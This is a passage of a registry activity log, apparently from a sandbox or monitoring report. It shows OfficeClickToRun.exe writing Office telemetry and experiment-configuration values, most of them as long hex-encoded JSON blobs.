22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436f707956657273696f6e496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f7279506167654372656174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765526573746f726556657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f72795061676553656c65637456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616e654e6f6e436c69636b61626c654974656d53656c65637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f63616c41637469766974696573426567696e526566726573685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6666696365436f6c6c61624163746976697479436f6d6d616e644d534f446f63756d656e7450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e74436865636b4f757446696c65546f4c6f63616c466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f67676c65486964655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f67676c6553686f775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225759574143616c6c6f757453686f7743616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747943616c6c6f757450726573656e7443616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e41637469766974794765744c6173745669657754696d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747946696e6443757272656e74557365724c6f67696e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747943616c6c6f7574436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253686f77536d616c6c53637265656e435759574143616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d7275416461707465725c22203a207b205c224576656e74735c22203a207b205c224872416464446f63756d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c6163655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e74576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c616365576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e745061746857697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c6163655061746857697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e74496e6465785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c616365496e6465785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22487252656d6f7665506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22417070446f63735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745c22203a207b205c225375624e616d657370616365735c22203a207b205c2241637469766174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6173744f70656e6564446f63756d656e744d657461646174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f6465726e446f6354656d706c617465536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225361766550726f6d707448656c7065725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e74436861745c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572436f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f6375 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|12" OfficeClickToRun.exe Key deleted \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceId = "0018801185E011A6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile\MsaDevice = "t=GwAWAbuEBAAUbVtUa9wjWgmEIwjX9d7dccnghw8OZgAAECrL545tCgeuprlzGfgPAdjgANPW9QRPyqK3r/a6DlJLdeACJWcBtLKWgjEhhto3P3+UWZzJXYYZOCkrHhsnYhNyNcBpl/MI6T6Atru0wm3m+zUlEK9x2aEjjdAOXiGeIhfYJeKsBkOcpS4xPAb6L0WiyqUr1KKvyfaJDcOxQL0r6UOAw6BqTWwUuOPg8DRToDZ9wWBO1Hul+mVjKCy/1H9AIhAnJ0iVf9bQ0iOjwQDB1yqqr4nAeLkKzcHbORU80RWqJlTaITSNx8Hjmn/TOFw00n2M+roR5iFrhdd9nSB9YA5tEAjLIOLdtunUoJUf92fqHwE=&p=" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|4" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 = 6e63795c22203a205c22477265617465725468616e457175616c546f4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696738395c22203a207b205c224576656e744672657175656e63795c22203a205c22477265617465725468616e457175616c546f4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696739305c22203a207b205c224576656e744672657175656e63795c22203a205c22477265617465725468616e457175616c546f4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e417269614d617854656172646f776e55706c6f616454696d65496e536563222c20225622203a2022696e7436345f747c3222207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e446f6e7457616974466f724f6e6544734e6574776f726b52656164794f6e466c757368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e456e61626c65416c6c417070496473466f72314453222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e457564624572726f7255726c222c20225622203a20227374643a3a77737472696e677c68747470733a2f2f65752d6f66666963652e6576656e74732e646174612e6d6963726f736f66742e636f6d2f4f6e65436f6c6c6563746f722f312e3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e4575646253687574646f776e5369676e616c222c20225622203a2022696e7436345f747c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e466c7573684265666f7265466c757368416e6454656172646f776e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e4f74656c52756c6573417070726f7665644651444e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e53686f756c6452656d6f766544617461507265666978466f72456e61626c6564544d4c4e616d657370616365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e566f6c756d65547261636b696e674d61784576656e7473222c20225622203a2022696e7436345f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4169725370616365222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224261636b656e645c22203a207b205c224576656e74735c22203a207b205c224c61796572486f7374496e697469616c697a6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d706f7369746f7253657373696f6e547970655c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2257696e33325c22203a207b205c225375624e616d657370616365735c22203a207b205c224c65676163795c22203a207b205c224576656e74735c22203a207b205c22416e696d6174696f6e50657263656e74556e64657233304650535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416e696d6174696f6e4176674650535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726f737357696e54496d654f6646697273744672616d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224176657261676550726573656e74735065725365636f6e645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4368617274696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436861727445326f536176655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224368617274696e67456e644c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e436c69636b546f52756e222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c225363656e6172696f5c22203a207b205c224576656e74735c22203a207b205c225570646174655461736b557064617465646574656374696f6e325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b557064617465646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b557064617465636c69656e74646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265706169725461736b46756c6c7265706169725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265706169725461736b52656d6f7665696e7374616c6c6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b436f6e6669677572656c696768745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c69656e747570646174655461736b436c69656e74646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b53747265616d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b437265617465776f726b696e67636f6e66696775726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b55706461746566696e616c697a655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225461736b4c61737452756e4865617274626561745c22203a207b205c224576656e74735c22203a207b205c225461736b4c61737452756e4865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22556e6976657273616c426f6f7473747261707065725c22203a207b205c224576656e74735c22203a207b205c224170706c69636174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c656374506172616d65746572735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c656374456d6265646465645369676e61747572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616c63756c617465506172616d65746572735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436c69656e744361624d616e616765725c22203a207b205c224576656e74735c22203a207b205c225461736b557064617465436c69656e74446f776e6c6f6164446f457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b436c69656e74446f776e6c6f6164446f457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253747265616d4361625c22203a207b205c224576656e74735c22203a207b205c22446f776e6c6f616453747265616d4361625c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225472616e73706f72745c22203a207b205c225375624e616d657370616365735c22203a207b205c224578706572696d656e74616c5472616e73706f72745c22203a207b205c224576656e74735c22203a207b205c22436162735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c224576656e74466c61675c22203a20323536207d207d207d2c205c225472616e73616374696f6e616c46696c654f7065726174696f6e735c22203a207b205c224576656e74735c22203a207b205c224170706c794368616e6765735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457865637574655472616e73616374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d2c205c224576656e74735c22203a207b205c225472616e73706f72745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f776e6c6f61644361625c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e446961676e6f7374696373222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22436f6c6c6563746f725c22203a207b205c224576656e74735c22203a207b205c2253746172745472616365436f6c6c6563746f725c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e446f6373222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22446f63756d656e74416374697669746965735c22203a207b205c224576656e74735c22203a207b205c2241637469766974794c6f67456e7472794372656174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e74727953657453746174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22536572766963654163746976697479526573756c745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674f6e436f6e74656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e717565756541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d69745175657565496e7365727441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d697451756575654469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e675c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f6744697363617264466f72446f63756d656e744368616e67655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67547269676765724173796e635461736b576f726b65725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654c6f61644173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e697446696c65506174685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565417070656e644173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565577269746541637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756552656d6f76654173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655772697465446f63756d656e74496e666f4865616465725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756554727944656c657465456d70747946696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e7365727441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e717565756541637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674372656174654c6f675c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67536176654e657746696c655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654c6f63616c4e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e674e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224170694f70656e41637469766974794c6f675769746853747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674361636865446f63756d656e74496e666f5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e74727946696e616c697a655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6746696c7465724f757443757272656e7455736572416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674c6f616446726f6d53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6753617665546f53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565436865636b5265766f6b65644544505c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565526570616972436f7272757074656446696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674d6f64696679436c6f6e655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c654f70656e4572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c65526561644572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c655265706c6163654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c6557726974654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655472756e6361746551756575655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d6974517565756548656c706572456e737572654469726563746f72795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d697451756575654d616e61676572437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241706943726561746541637469766974794c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224170694372656174654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637469766974794c6f674173796e635461736b5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22436f6c6c6162436f726e65725c22203a207b205c224576656e74735c22203a207b205c22 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\LastClean = 70d314b2c14cdb01 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0 = 4d736f3a3a436865636b73756d52656769737472793a3a446174617c75696e7436345f747c2d313138343432373939303939323831303536323b456373436f6e666967526573706f6e7365446174617c7b202256657222203a2022696e7433325f747c30222c2022436f6e6649647322203a20227374643a3a77737472696e677c502d522d313039383135382d312d352c502d522d313038353730312d312d312c502d522d37363735372d312d322c502d522d35343930332d312d332c502d522d32363134362d372d31372c502d442d32393633352d312d312c502d442d32373038372d312d392c502d522d37393638382d312d332c502d522d313431353039342d342d342c502d522d313137333439332d342d392c502d522d313139363439302d342d342c502d522d313139333138392d342d362c502d522d313037333732342d342d342c502d522d313036353130332d342d352c502d522d313032313439312d342d342c502d522d313031393539312d342d342c502d522d313030343536312d342d342c502d582d313432313335342d322d332c502d582d313331353638332d322d332c502d582d313239303237382d312d352c502d582d313234353038332d322d332c502d582d313233363435392d312d332c502d582d313134363830352d322d352c502d582d39383531382d362d392c502d582d313134363832312d312d352c502d582d313036313437302d322d332c502d582d313032313936352d312d372c502d582d313032313936382d322d332c502d522d313032353434342d342d352c39346232363332303a3635363438332c67323266693333373a3631313030322c33673368653238363a3631373439362c37616964623231343a3536333533312c30683933333737393a3535323434392c69376534313433393a3437363437342c626c6f636b6564677261706869637361646170746572353a3437353839392c32693838353330343a3532363836352c66653635313636373a3336313635382c37326838623835393a3238343430302c38306562633336353a3236353636392c502d522d35383634302d312d332c502d522d313436343838302d362d372c502d522d313436313239372d382d352c502d522d33353039392d322d342c502d522d313233363938302d382d362c502d522d33343834332d342d362c502d582d313238393830382d322d332c502d582d37313237342d312d372c502d582d313131353931322d322d352c502d582d313036373430382d322d332c502d582d313036333834332d322d332c502d582d313031393934352d312d372c502d582d313030363839392d312d352c502d582d3130393833322d312d352c502d582d313032303631372d312d332c502d582d3130373935312d312d392c502d582d3131383137312d312d332c502d582d39353330302d332d31312c502d582d38373033372d312d332c502d522d313431333031342d342d362c502d522d313337373835332d31342d31352c502d522d313233333439372d342d352c502d522d313233313633372d31332d31362c502d522d34353438332d31362d35332c502d522d35303731372d31382d36302c502d522d38373538372d342d342c502d522d37353036392d312d332c502d522d37353030312d312d332c502d522d36383135322d31382d32312c502d522d35323331362d31382d33372c502d522d34393136322d31382d31332c502d522d34393136312d31382d31332c502d522d34303235332d362d31392c502d522d34303235342d362d31382c502d522d33353430312d362d372c502d522d33323130372d32322d32322c666a6731683336383a3634353432312c636c70726f3130353a3436363736322c63376a33683733363a3437353836342c36633932393731393a3339333435382c6a6a6432663231333a3336353635352c636c3132303a3238353532342c636c7265703130363a3238343830372c636c7265703238323a3333353536382c636c63646e3338393a3234313632352c636c3937313a3239363531342c636c7265703730333a3232343731392c757073656c6c5f616e645f686172646c696e6b696e673a3137363837342c636c7573653537363a3234333839332c502d522d32343938302d382d34382c502d522d31383237392d322d36352c502d522d3131333931352d382d372c502d522d35323938322d31382d33342c502d522d35313134352d322d372c502d582d313031323533332d312d352c502d522d313233383832352d342d342c502d522d313138363930352d31382d31362c64696173793933323a3237333238302c502d522d313435343731322d312d332c502d522d313431343731332d312d332c502d522d313236373631362d312d332c502d582d313031353330322d31332d34322c502d582d38353335392d312d31332c502d582d38393031322d312d31312c502d522d313232383532342d31322d31342c502d522d313232313238362d31302d392c502d522d313232313235322d31342d31392c502d522d313232313234312d31342d31312c502d522d313136313934392d31342d31352c502d522d313034323432302d342d332c502d522d313033363136342d342d372c502d522d37393631362d312d332c502d522d37373632312d312d332c502d522d37373230342d312d332c502d522d37363130372d312d332c502d522d37343333342d312d332c502d522d37343433392d312d332c502d522d37333634322d312d332c502d522d36323837352d322d342c502d522d36303537392d322d322c502d522d36303333332d312d332c502d522d35383130372d322d322c502d522d35353734332d312d332c502d522d35313935382d312d352c502d522d33383038352d31322d392c6475616c7069706532743a3635373939332c6e617469766577696e333272646c3a3138363734342c646f6373686f6d6570616765736561726368656e61626c65616767726567617465646d7275736561726368736f757263653a3137353733392c6475616c7069706532743a3635373939332c502d522d313033343136392d31302d372c502d582d313034383531322d322d352c502d582d313432303136352d322d332c502d582d313235313332362d322d332c502d582d313235303339302d312d332c502d582d313130363939382d312d332c502d582d313038363634342d322d372c502d582d313037383537362d322d332c502d582d39333738372d332d31312c502d582d313035363137372d312d332c502d582d37393936312d312d372c502d582d39393034342d312d332c502d582d39363134312d312d332c502d452d32383637372d43312d332c502d522d313431323530312d31322d31322c502d522d313236343739372d31352d31302c502d522d313235313333322d312d312c502d522d313235303430352d322d322c502d522d313133333738332d31342d31362c502d522d35353132322d382d382c502d522d35303235352d31302d392c502d522d34353331342d31302d31362c396a3569393434333a3638313835332c37313566643231313a3633353337342c64697361626c656f666669636576736f5f383835373934385f726f77616e64636f6c756d6e736570617261746f723a3535303135372c64697361626c656367666978646f75626c65636f6c756d6e696e73657274696f6e3a3534383533352c313134666a3231303a3637323639302c67726f757062795f7069766f7462795f6574615f6c616d626461735f74726561746d656e743a3634303639352c37393332313738393a3335353439302c65787069766f746e6f6e64657374727563746976656175746f67726f75703a3338373137392c32696539633230333a3333363131332c657861766f3833333a3234393839332c6d6f6465726e62726f777365726f617574686469616c6f673a3230383934332c65786973723434383a3230383933342c64697361626c656f666669636576736f5f383835373934385f726f77616e64636f6c756d6e736570617261746f723a3535303135372c64697361626c656367666978646f75626c65636f6c756d6e696e73657274696f6e3a3534383533352c67726f757062795f7069766f7462795f6574615f6c616d626461735f74726561746d656e743a3634303639352c502d582d313234303832332d322d332c502d452d33383233312d322d342c502d522d313237383439392d342d342c502d522d313234353636322d31362d342c502d522d39343536302d31342d31322c502d522d39343138392d31342d31332c502d522d39333838322d31342d32362c502d522d36313134372d4331372d322c502d522d35343732382d31362d32332c502d522d35343639382d31362d31362c502d522d35343635382d31382d31392c502d522d33383330362d31382d332c502d522d33343031392d342d332c77696e333264657669636563616e61727963663a3534313438342c77696e333264657669636563616e61727963663a3534313438342c502d582d313434383335342d312d332c502d582d313339313036312d312d332c502d582d313132363233382d322d392c502d582d313035313539312d322d352c502d582d313133373135372d312d332c502d582d313030373331342d312d31352c502d582d313037393733332d322d372c502d582d313036343438332d322d332c502d582d38353839362d312d31392c502d582d39313739302d312d352c502d582d36313130322d332d31312c502d582d35313236322d312d31312c502d582d35323539312d312d31312c502d582d39383635352d312d352c502d582d38343436342d312d352c502d582d35343335382d312d372c502d582d35333937352d332d392c502d582d36393138392d312d372c502d582d35363237342d312d392c502d582d36333133342d312d372c502d582d35383637382d312d352c502d582d35353833322d312d362c502d582d35363134372d312d352c502d582d35363135342d312d352c502d582d35343231322d312d352c502d522d313532333631372d31332d322c502d522d313435353535392d31332d362c502d522d313435323038382d342d342c502d522d313435323034332d342d342c502d522d313435323034312d342d342c502d522d313435323038392d342d342c502d522d313434373835302d342d372c502d522d313431353833312d382d342c502d522d313431333930332d31342d372c502d522d313339313439312d392d382c502d522d313237333334332d342d342c502d522d313235303933352d342d342c502d522d313234303834312d382d342c502d522d313232393636362d362d342c502d522d313136373231332d362d342c502d522d313135373737322d31332d31312c502d522d313135333933372d382d342c502d522d313135323938322d342d342c502d522d313134363233322d382d342c502d522d313132393434332d382d342c502d522d313132373034302d342d392c502d522d313038353239392d382d352c502d522d313038323936382d382d352c502d522d313037343033302d382d342c502d522d313036333936382d31342d32312c502d522d313035333236392d382d352c502d522d39333937302d382d342c502d522d36393036352d312d332c502d522d35393139332d312d332c502d522d34353630392d31342d362c502d522d34353139372d322d362c502d522d34303938302d31382d31362c502d522d33393032392d352d31382c502d522d33353136352d322d372c502d522d32393830392d312d372c502d522d32363936382d332d392c38306361643731383a3638323439392c3138676a653336383a3637373436302c62617463687363686564756c65726c69666574696d656d616e6167656d656e745f74726561746d656e743a3637383837352c686e6c6162656c6374726c3a3630333036382c36336439373330323a3531313533352c66696c69733738373a3637383737372c6d756c7469706c6574696d656f75747374726561746d656e743a3432313835312c646f63756d656e7473756d6d617279656e61626c65643a3430353339352c66696c69733436363a3333303234372c66696d6f633234383a3139333439312c66697465733231373a3136313436382c66697265663334363a33343532352c66696d6f633538393a32383937392c6f6e656472697665636f6e76657267656e6365656e6c69676874656e6564726f6c6c6f75743a3135393033382c66696f6d693239333a3131383038312c6669656e613934373a33303633352c66697374613430373a36313032372c6669656e613930333a36353934342c66696461763236353a35353033352c66696361633834313a34393636342c6669656e613431353a33383738302c6669656e613439303a33343138312c72656d6f74656d6f76656465766963653a34323530302c6669656e613237363a34313030342c6669656e613338313a34393939372c66696c69733738373a3637383737372c62617463687363686564756c65726c69666574696d656d616e6167656d656e745f74726561746d656e743a3637383837352c502d522d313435323232392d31382d392c502d